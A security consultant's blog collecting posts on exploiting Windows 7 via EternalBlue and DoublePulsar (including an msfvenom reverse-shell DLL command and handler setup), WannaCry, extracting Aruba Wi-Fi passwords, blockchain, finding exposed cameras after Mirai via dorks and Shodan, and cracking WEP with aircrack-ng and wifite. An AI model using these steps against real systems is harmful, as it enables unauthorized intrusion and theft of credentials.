Exploiting Windows 7 & 2008 with EternalBlue and DoublePulsar

Few weeks back ShadowBrokers and Equation Group two hacking groups managed to leak NSA’s version of hacking tool “Fuzz Bunch” which can be maliciously utilized to hack any Windows 7 and Server 2008 R2 (x64) All Service Packs without needing authentication.

The FuzzBunch tool kit comes with a pre-cooked exploit EternalBlue that exploits Windows SMB vulnerability and plugin DoublePulsar. For your information the same exploit code was taken advantage off to create WannaCry ransomeware that was successful in creating a big impact on computer networks all around the world.

With all that happened in the past, I decided to document the step by step approach of hacking a Windows 7 machine with FuzzBunch Toolkit.  So let’s get started.

Note: This tutorial is just for informational and educational purposes, the author will not be responsible for any illegal hacking attempts against individuals or a production network made by any individual or a group.

Environment:


  • Windows 7 : 10.21.1.118 : Attacking Machine installed with Fuzz Bunch (installation of fuzzbunch has few dependencies like python-2.6, pywin32-212)
  • Kali: 10.21.1.119: Second attacking machine that will be used for creating malicious dll and for gaining access
  • Windows 7: 10.21.1.124 : Victim
  1. Once you have the setup ready, execute “python fb.py” on windows attacking machine to initialize fuzzbunch toolkit.
  2. Next configure the victim IP,  fall back IP, redirection, project name and log directory (attacking Windows 7).
  3. The first step in exploitation is to select the EternalBlue exploit so we can execute the FuzzBunch. On the cmd prompt type “use EternalBlue” and press enter to configure the options available, such as target IP, port, target os, etc.
  4. Once you are done it will ask you to execute EternalBlue, you can press enter to execute on the target.
  5. As you can the target is successfully exploited and we should see the message “Eternalblue Succeeded”
  6. Now its time to gain access to the machine using the backdoor installed. And for this purpose we will use “msfvenom” available in kali to create a malicious dll and inject the same through “DoublePulsar” plugin.
  7. Execute the below msfvenom command to create a malicious dll. “msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<kali machine IP> LPORT=<any non-standard port> -f dll -o <filename.dll>”
  8. Copy the dll to windows attacking machine to be able to inject while using DoublePulsar plugin.
  9. Launch plugin by typing “use Doublepulsar” and configure target ip, port, protocol, target os architecture, malicious dll to be injected, etc.
  10. Before you execute the plugin open metasploit and use “exploit/multi/handler” with the same payload used while creating the dll and start listening.
  11. Now you are good to launch the “DoublePulsar” exploit, if all goes well you will successfully exploit the target to gain access.

Follow the similar steps to replicate the scenario in you test labs. Feel free to contact if you have any queries. charit0819[at]gmail[dot]com

PS: Metasploit has also developed modules for the detection and exploitation of the vulnerability.

WannaCry – A Simple Perspective

Till now more than 100 countries (UK, US, Russia, China, etc ) have been severely impacted by one of the professional crafted ransom-ware called “WannaCry” / “WannaCrypt”. The attack came into limelight when British National Health Service were targeted and their IT systems and patient information privacy was invaded and were bought down to knees. The worm has already made a damage worth millions and still likely to spread. Group name @0xSpamTech has claimed the responsibility. The worm encrypts the files using AES and RSA encryption which can only be decrypted using a unique key

As per wiki “Ransomware is a type of malicious software that carries out the cryptoviral extortion attack from cryptovirology that blocks access to data until a ransom is paid and displays a message requesting payment to unlock it”

But this worm/ransomware operates differently from their standard definition. The worm includes a component (payload) that searches for vulnerable systems on the network to infect them as well. Due to its unconventional behaviour the worm is able to continue infecting millions of Windows based machines all over the globe. The world of security has not witnessed a worm of such kind in the last 2 years.

WannaCry worm uses a publicly known exploit (MS17-010) which is trigger by sending a specially crafted packet to a SMBv1 server. The vulnerability is fixed now by Microsoft but millions of organizations are still yet to completely patch their IT infrastructure.

Microsoft has already release a set of patches that needs to be installed in every production environment to prevent and block the worm from spreading/infecting others. Follow the link to read more.

List of windows affected by this worm.
1. Windows XP
2. Microsoft Windows Vista SP2
3. Windows 7
4. Windows 8.1
5. Windows RT 8.1
6. Windows Server 2008 SP2 and R2 SP1
7. Windows Server 2012 and R2

Two signatures of worm infection is being observed, which it utilizes to infect vulnerable machines.
– Social Engineering, where the end user is persuaded/tricked to click on a link.
– Unpatched machines running vulnerable version of SMB (v1) protocol.

After infecting the target PC user will be presented with a message where they are asked to deposit 300$-600$ in a form of bitcoins for decrypting and unlocking their files.
wannacry_05_1024x774

If you are interested to track the payments made to hacker’s account please follow the link and you can track payments to their Bitcoin addresses listed below
– 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
– 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
– 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

How can you protect yourself
1. Get the latest pacthes available from Microsoft and deploy them ()
2. Disable SMBv1 completely
3. Add firewall rules on the perimeter firewall to block any incoming connection for port 445

Extracting Wi-Fi Passwords from Aruba Virtual Controller

password

Like usual I was conducting pentest and found an interesting way to extract the passwords for multiple access points managed using Aruba Virtual Controller IAP 105.

maxresdefault

What is a Virtual Controller ?

Aruba Instant virtual controller gives you the flexibility of configuring multiple access points from a centralized location.
You can distribute, store and regulate configuration to distributed access points from one place. Virtual controller is basically a single point of management for your configuration and firmware.
Fimware version prior to IAP-105 are vulnerable to access points password disclosure vulnerability, any malicious user having access to the management console can extract sensitive details using just browser(chrome, firefox, IE, etc.) debugger.
You can extract the passwords using below simple steps:
1. Login to Aruba virtual controller (in my case it was default admin-admin).
172-16-120-178_admin_admin
2. Click on the network you want to disclose wireless key for.
3. Click edit Factory Settings >> Go to Security Settings
4. Open browser’s debugger.
5. For the password text box change type to “text” in html.
6. Voila !!

Blockchain : The Future of Digital Payment

1

  1. What is Blockchain?

Today we rely completely on the middle man for our day to day services like banks, service providers, and credit card companies. Blockchain is a vast global distributed system acting as middlemen which runs on systems around the world and is open for everybody. Where trust in not established by a middleman but with mass collaboration, clever code and of course cryptography and that’s what this amazing technology is.

Usually while working with digital content you are sending a copy and retaining the original with yourself but when it comes to value based things like money, stocks bonds and financial assets, sending a copy is not a good idea, for example : If I am sending you 100 dollar a payment for something, it become really important that you have those 100 dollar and I have don’t, because if I can share the same 100 dollars among other transactions than the 100 dollars becomes worth less.

  1. How Blockchain works

Using Blockchain buyers and sellers can transfer value directly to each other over the internet in the most secure way possible without the need to third party. Blockchain is a distributed ledger maintained globally on multiple systems across the globe not owned by any specific party, the database of transaction is secure with clever code and strong cryptography making it hacker proof. Blockchain will do for business what internet did for communication.

Simple Real Life Example : A journey of diamonds from mines to consumer hands covers a complex path of legal, regulatory, financial manufacturing and commercial practices. Current supply chain for diamonds has to rely on intermediaries on every step of the way from government officials, dealers and banks which adds time and cost. Smuggling and frauds in diamonds trading can hamper governments in collecting fair export taxes and as a result consumers will face the cost of counterfeit products or unethically mined stones.

This is where Blockchain can come into picture to rescue us and has the capabilities to eliminate these vulnerabilities with distributed, secure and transparent transactions. Block chain provides all parties involved with synchronized network of transactions, it records every sequence of transactions from beginning to the end, whether it is 100 steps in procuring goods  or just a single direct transaction. Each transaction that occurs is put into the block and each block is connected with the one before and after it, then groups of transaction are attached together and the fingerprint of each transactions added to the next thus creating an irreversible chain.

Block chain is capable of tracking goods from the raw materials to the finished product in consumer’s hands with embedded security and transparency. Block chain is distributed, permission-ed and secure which makes it more reliable than the traditional payment systems used currently globally.

Blockchain ledgers are distributed across the network which ensures no one person or an organization can edit the transaction records. All parties involved in the trade of goods from raw to finished products owns a copy of every single transaction data and no transactions can be added to the Blockchain without consensus of across the parties involved. This means no single entity or a company can add or alter the transactions without being permanently recorded which makes it highly secure eliminating the risk of frauds.

  1. How to use and utilize Blockchain as an individual                                  A) Set up your Blockchain wallet (https://blockchain.info/)

2

3

B) Get some bit coins (https://bitcoin.com)

4

C) Find merchants who accept bitcoins and start trading

5

D) If you want to receive bitcoins you need to share the code generated by your wallet

6

  1. Blockchain Benefits and Challenges

Benefits

  • It enables to make exchange of value without a third party being involved
  • Wallet owners has full control over the information and resources
  • The data in Blockchain is consistent and secure
  • Due to its decentralized nature the technology is not prone to central point of failure
  • Any changes made to the transactional records is publicly viewable
  • Helps ins lowering transactions costs

Challenges

  • The underlying infrastructure needs to be reliable and robust to support faster transactions
  • Blockchain technology has to be accepted by the government regulations for its widespread adoption
  • Relatively higher energy is being consumed in validating Blockchain transactions
  • High initial capital is required for large business environments
  • Still a few privacy and security concerns needs to be addressed for gaining trust from general public

Mapping Mirai Botnet

mirai A malicious botnet made out of Mirai malware has disrupted internet traffic to popular websites like twitter, github, paypal, etc in the United States. According to popular network security companies the botnet was specially crafted to attack internet-connected cameras and DVRs. The Chinese company “Hangzhou Xiongmai Technology” (network camera manufacturers) has admitted that their devices were behind Fridays DDoS attack and they are recalling 3.8 million affected devices for fixing them. DNS service provider company Dyn has also confirmed that they observed millions of discrete IP addresses associated with the Mirai botnet. Most of the service providers affected by the botnet were able to easily recover from the attack but botnets like these can attack again in coming future. Last month the same botnet took Brian Kerb’s website down through delivering 665 Gbps of traffic.

How botnet works: The botnet is designed to brute force telnet service on internet-connected cameras installed with Dahua firmware or a generic management interface called “NETSurveillance” with 62 different combinations of usernames and passwords (admin:admin, admin:12345, etc.). Once botnet is able to successfully login into the camera login portals the services like telnet, ssh and HTTP are blocked and then device is seeded with malicious program that turns it into an enslaved bot. These bots will now report to the command and control centre from where DDoS attacks can be launched to make websites unresponsive. This attacks would have be avoided if the camera login panels or the real time streaming protocol service is restricted for remote access.

Source code released online : The author behind the Mirai malware has released the code online for research and development purpose stating “I have earn my share of money and now I want to get out of this business” Follow the link to download source code : https://github.com/jgamblin/Mirai-Source-Code.
What to do : The Chinese company has advised its customers to change default passwords and update the firmware of the device and keep the devices disconnected until patched. Few researchers are also augmenting on the subject why a devices like network camera needs remote access from internet and up to a certain level I am also in favor of this response. The companies making IoT devices should enforce the user during its initial configuration to change the default password and remote access to such sensitive and weak IoT devices should not be enabled.

How you can access unprotected network cameras :
1. Try searching on Google for “inurl:index.shtml” and follow the link with IP address in the url. If lucky enough you will be able to see live view of an internet connected camera live streaming from some other continent.

cam

2. Multiple websites are available on the internet that can be used to look for devices connected to the internet with a specific configuration. Below is the screenshot for your reference where I tried searching for specific network camera on the internet.
shodan
And clicking to any of the above listed options will take you to the login panel straight away. I think now you can also realized how easy it can be to attack a specific set of devices connected to the internet.
cam1Conclusion: It’s very probable to see such DDoS attacks in near future targeting vulnerable IoT device. The manufacturers of these devices should consider few basic security practices before shipping the products.

WI-FI (WEP) cracking with Aircrack (easy 4 steps)

In my last post I tried exploiting WEP wi-fi networks with wifite. Using  wifite was no co-incidence but I was facing few difficulties that forced me to use something simple and easy. But something kept bothering me inside, why I can not crack the same using aircrack and I desperately wanted to try it out.

So I woke up the next morning and started going through some of the best articles available on the web just to warm up a lil bit, which certainly helped. And here we are with a successful cracked WEP network

Follow the below steps to successfully crack WEP based wi-fi networks.

  1. Start your wi-fi interface in monitor mode with the command “airmon-ng start wlan0” ( I am using external wi-fi adapter for more attack surface)mon0
  2. Start listening to near available access points “airodump-ng mon0” and choose your target. For me the target will be the same as old one “*******250”.airodump
  3. Start listening to a specific WEP network “airodump -ng -c <channel no> -bssid <access point mac> -w <file name> mon0airodump2
  4. Once you see significant number of IVs are captured than go ahead and launch aircrack “aircrack-ng <file name>“.aircrack
  5. DONE !! 😀

Note : This tutorial is for educational purpose only, use the steps at your own risk and attack the AP which you own, unless and until you have permission from the owner please do not try this.

In my next post I will share my experience of trying to do get  this to  another level WPA/WPA2.

Wi-Fi (WEP) Cracking in less than 5 mins

wifite

As a part of a wireless security assessment I was asked to assess clients’s wireless security posture. A day before I decided to do some homework and try few tools available in kali linux. I started with a tutorial related to aircrack-ng and its related tools set where we capture IVs, de-authenticate clients and crack the IVs, even after a couple of hours I was unable to crack even the weakest networks around.

Out of frustation I decided to try out another tools and this time it was “wifite”, which  I never used or heard off. After reading about a bit online I planned to go ahead and start playing around. And surprisingly it took less than 3-5 mins for wifite to crack the network I was struggling with.

Below are the steps I followed to crack the WEP network.

  1. Run command “wifite” to initate and wait for at least 3-5 minutes and let the tool  collect near by wireless networks info like security protocol, signal strength, WPS yes/no, clients connected or not, etc.

wifite

2. Once you see a significant number of near by access point press “Ctrl+c” to choose which access point to attack. I selected “****250” access point as my target.

Just select your target and let the tool do it’s magic.cracked

And voila !! In less than a minute the key got cracked.

Conclusion : After trying WEP cracking I realised how weak WEP can be.

Suggestion : Never use WEP as security protocol for your access points.

Be Safe Stay Secure !! and Kudos to author of “wifite”

Note : This tutorial is for educational purpose only, use the steps at your own risk and attack the AP which you own, unless and until you have permission from the owner please do not try this.

In my next post I will share my experience of trying to do get  this to  another level WPA/WPA2.

Consultant – IT Security